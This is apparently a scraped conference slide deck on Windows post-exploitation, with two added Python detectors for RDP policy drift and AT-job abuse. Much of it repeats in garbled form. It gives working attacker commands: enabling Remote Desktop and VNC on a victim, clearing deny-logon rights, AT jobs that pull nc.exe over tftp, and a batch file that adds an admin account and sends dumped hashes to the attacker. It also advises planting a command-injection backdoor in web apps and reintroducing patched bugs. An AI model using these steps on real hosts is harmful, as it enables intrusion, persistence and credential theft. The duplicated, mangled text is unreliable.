seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
– This file will fix policy settings that are in your way
– Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
– Then perform these commands:
• sc config termservice start= auto
• regedit /s enable_ts.reg
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
• secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
• gpupdate /force
• net start "terminal services"
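The same two files that secedit and regedit push onto the host are what a defender can read back to spot this change: a `.reg` export of the Terminal Server key and a secedit template of the privilege rights. The Python below is an added example, not code from the talk; it parses both formats and reports every setting that departs from a hardened baseline. The baseline itself is an assumption of the example (RDP denied, remote-interactive logon held only by the built-in Remote Desktop Users group S-1-5-32-555, interactive logon only by Administrators S-1-5-32-544 and Users S-1-5-32-545), as are the sample file contents, which are constructed from the slides' fix_ts_policy.ini and enable_ts.reg.

```python
"""Audit a .reg export and a secedit template for Remote Desktop and logon-right drift.

Added example (not from the slides): parses the two file formats the slides use
and reports every setting that departs from a hardened baseline.
"""
import re

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

# Hardened baseline (an assumption for this example, not from the talk):
# RDP connections denied, and logon rights held only by the well-known groups
# Remote Desktop Users (S-1-5-32-555), Administrators (-544) and Users (-545).
BASELINE_TS = {"fDenyTSConnections": 1, "TSEnabled": 0}
EXPECTED_GRANTS = {
    "seremoteinteractivelogonright": {"*S-1-5-32-555"},
    "seinteractivelogonright": {"*S-1-5-32-544", "*S-1-5-32-545"},
}
DENY_RIGHTS = ("sedenyinteractivelogonright",
               "sedenyremoteinteractivelogonright",
               "sedenynetworklogonright")


def parse_reg(text):
    """Parse a minimal .reg export (dword and string values) into {key: {name: value}}."""
    result, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            key = m.group(1)
            result[key] = {}
            continue
        m = re.match(r'^"([^"]+)"=(.+)$', line)
        if m and key is not None:
            name, val = m.groups()
            # dword:0000000a -> 10; anything else is kept as a string
            result[key][name] = int(val[6:], 16) if val.startswith("dword:") else val.strip('"')
    return result


def parse_inf(text):
    """Parse a secedit template ([Privilege Rights] etc.) into {section: {right: [accounts]}}."""
    result, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            result[section] = {}
            continue
        if "=" in line and section is not None:
            right, accounts = line.split("=", 1)
            result[section][right.strip().lower()] = [a.strip() for a in accounts.split(",") if a.strip()]
    return result


def audit(reg_text, inf_text):
    """Return a list of human-readable findings; an empty list means no drift from baseline."""
    findings = []
    ts = parse_reg(reg_text).get(TS_KEY, {})
    for name, want in BASELINE_TS.items():
        if name in ts and ts[name] != want:
            findings.append(f"registry: {name}={ts[name]} (baseline {want})")
    rights = parse_inf(inf_text).get("Privilege Rights", {})
    for right, allowed in EXPECTED_GRANTS.items():
        for acct in rights.get(right, []):
            if acct not in allowed:
                findings.append(f"policy: {right} granted to {acct}")
    for right in DENY_RIGHTS:
        # A deny right that is present but empty has been cleared on purpose
        if right in rights and not rights[right]:
            findings.append(f"policy: {right} cleared")
    return findings


# Constructed samples: the first pair mirrors the slides' enable_ts.reg / fix_ts_policy.ini,
# the second pair is what the hardened baseline looks like.
WEAKENED_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""
WEAKENED_INF = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""
HARDENED_REG = r"""[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000001
"TSEnabled"=dword:00000000
"""
HARDENED_INF = """[Privilege Rights]
seremoteinteractivelogonright = *S-1-5-32-555
seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-545
sedenynetworklogonright = Guest
"""

if __name__ == "__main__":
    for finding in audit(WEAKENED_REG, WEAKENED_INF):
        print(finding)
```

On a live host the inputs come from `reg export` of the Terminal Server key and `secedit /export /cfg <file>`; the slides' weakened pair produces seven findings (both registry values flipped, both logon rights granted to the planted account, all three deny rights cleared), while the hardened pair produces none. The parsers are deliberately minimal and only understand the value kinds the slides use.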
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
– The Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
– Clipbook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled
net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
– Enable/start services
– Transfer files
– Adding users
– Messing with the registry/policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – Flow
• Establish authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols; TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
– net use \\target
– net time \\target
– at \\target (net time +1min) "tftp -i use GET e.bat"
– at \\target (net time +2min) e.bat
– e.bat does:
• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)
• Gets hash-dumping tools and dumps hashes
• Sends hashes, identified by IP, back to the attacker host
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME
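The AT workflow on slides 57 to 61 leaves a distinctive trail for the defender: jobs auto-named At1, At2, ... that run as SYSTEM and whose commands pull tooling with tftp or add local administrators. The Python below is an added example, not part of the talk; it scores each scheduled-task creation record against those traits. The pipe-delimited export of Event ID 4698 ("a scheduled task was created") records, the sample lines themselves, and the allowlist of deployment accounts expected to create SYSTEM tasks are all constructed assumptions of the example.

```python
"""Flag AT-style scheduled-task abuse in an exported Security log.

Added example (not from the talk): scores Event ID 4698 records against the traits
of the slides' AT workflow (AtN job names, SYSTEM context, tftp / account-creation commands).
"""
import re

# Deployment accounts expected to create SYSTEM tasks (assumption for this example).
ALLOWED_SYSTEM_CREATORS = {"CORP\\sccmsvc"}

# Legacy at.exe jobs are auto-named At1, At2, ... (stored as AtN.job under %SystemRoot%\Tasks).
AT_JOB_NAME = re.compile(r"^\\At\d+$")

# Command traits the slides describe: tftp pulls, local account / admin-group
# creation, registry and service changes.
SUSPICIOUS_CMD = re.compile(
    r"\btftp\b|\bnet\s+user\b.*/add|\bnet\s+localgroup\s+administrators\b"
    r"|\breg\s+add\b|\bsc\b.*\b(config|start)\b",
    re.IGNORECASE,
)

SYSTEM = "NT AUTHORITY\\SYSTEM"


def parse_export(text):
    """Parse constructed 'event_id|creator|task|run_as|command' lines into dicts."""
    events = []
    for line in text.splitlines():
        parts = line.split("|", 4)
        if len(parts) != 5:
            continue
        event_id, creator, task, run_as, command = parts
        events.append({"event_id": int(event_id), "creator": creator, "task": task,
                       "run_as": run_as, "command": command})
    return events


def score_event(ev):
    """Return (score, reasons) for one task-creation event; higher is more suspicious."""
    score, reasons = 0, []
    if ev["event_id"] != 4698:
        return 0, reasons
    if AT_JOB_NAME.match(ev["task"]):
        score += 2
        reasons.append("legacy at.exe job name")
    if ev["run_as"] == SYSTEM and ev["creator"] not in ALLOWED_SYSTEM_CREATORS:
        score += 1
        reasons.append("runs as SYSTEM, created by non-deployment account")
    if SUSPICIOUS_CMD.search(ev["command"]):
        score += 2
        reasons.append("command matches post-exploitation pattern")
    return score, reasons


def detect(text, threshold=2):
    """Return alerts (task, creator, score, reasons) for events scoring at or above threshold."""
    alerts = []
    for ev in parse_export(text):
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"task": ev["task"], "creator": ev["creator"],
                           "score": score, "reasons": reasons})
    return alerts


# Constructed sample export (not real log data): one benign deployment task,
# the slides' At1/At2 pattern, a user's own task, and an admin-creation task.
SAMPLE_LOG = """\
4698|CORP\\sccmsvc|\\Microsoft\\Windows\\Defrag\\ScheduledDefrag|NT AUTHORITY\\SYSTEM|%windir%\\system32\\defrag.exe -c
4698|CORP\\backupsvc|\\At1|NT AUTHORITY\\SYSTEM|tftp -i 10.0.0.5 GET e.bat
4698|CORP\\backupsvc|\\At2|NT AUTHORITY\\SYSTEM|e.bat
4698|CORP\\jdoe|\\Reminder|CORP\\jdoe|notepad.exe todo.txt
4698|CORP\\helpdesk|\\Cleanup|NT AUTHORITY\\SYSTEM|net user hacked hacked /add & net localgroup administrators hacked /add
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert["task"], alert["score"], "; ".join(alert["reasons"]))
```

The scoring is additive so that a single weak signal (a SYSTEM task from an unfamiliar account) is not enough on its own, while the At1 job with a tftp pull scores on all three traits; At2, which merely runs the downloaded batch file, is still caught by the job-name and context traits, which is the point of not keying the rule on the command text alone.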
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use/re-use
– Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
– Beyond EIP – the theoretical tool development end of things (spoonm & skape)
– Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
– Thanks to
• All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
• HD Moore especially, for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 5
Post Exploitation Concepts Overview
Slide 6
What Is Post Exploitation
bull Itrsquos what you do after you get rootndash Note This talk assumes you have access
bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 6
What Is Post Exploitation
bull Itrsquos what you do after you get rootndash Note This talk assumes you have access
bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
